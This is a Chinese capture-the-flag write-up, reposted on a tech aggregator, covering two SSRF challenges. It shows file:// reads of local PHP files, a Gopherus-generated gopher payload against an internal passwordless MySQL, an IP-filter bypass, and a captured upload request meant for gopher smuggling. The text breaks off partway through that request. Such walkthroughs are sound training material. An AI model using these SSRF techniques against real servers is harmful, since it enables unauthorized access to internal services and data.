基础题(续)

编程入门 行业动态 更新时间:2024-10-19 03:29:54

<a href=https://www.elefans.com/category/jswz/34/1770030.html style=基础题(续)"/>

基础题(续)

1,网站联通测试系统

类型:ssrf

  1. 打开题目,查看网页源代码,发现
  2. 尝试使用file伪协议读取goodjob.php
file:///app/public/goodjob.php
发现提示
![在这里插入图片描述](.png)3. 添加localhost域名进行访问

file://localhost/app/public/goodjob.php
可以发现程序进行了 curl ‘file://localhost/app/public/goodjob.php’ 操作, 右键查看源代码,
得到goodjob.php文件内容
4. 可以发现提示信息,Mysql连接信息。 root用户且无密码,尝试gopher伪协议攻击内网mysql服
务查询hahaha数据库flag表里的值
使用工具 :[Gopherus]
python gopherus.py --exploit=mysql
5. 将脚本输出的url粘贴至页面表单处提交,发现提示

6. 绕过ip限制[127.0.0.1.:3306],获取flag

2,本地文件上传

类型:ssrf

  1. 打开链接,右键查看网页源代码,发现提示信息
  2. 通过url参数访问链接(直接访问http://47.104.255.11:10011/flag.php ,会显示Just View From
    127.0.0.1)
http://47.104.255.11:10011/?url=http://127.0.0.1/flag.php

3. 上传文件尝试,依然Just View From 127.0.0.1,题目对flag.php限制只能本地访问,故可利用ssrf
漏洞将文件上传的POST请求构造为gopher伪协议url,从而进行内网上传
3. 上传文件,通过Burp拦截获取请求包

POST /flag.php HTTP/1.1
Host: 47.104.255.11:10011
Content-Length: 325
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://47.104.255.11:10011
Content-Type: multipart/form-data; boundary=----
WebKitFormBoundaryZKOAsg7lA0C323gB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/91.0.4472.164 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/
apng

更多推荐

基础题(续)

本文发布于:2024-03-07 10:02:13,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1717520.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:基础

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!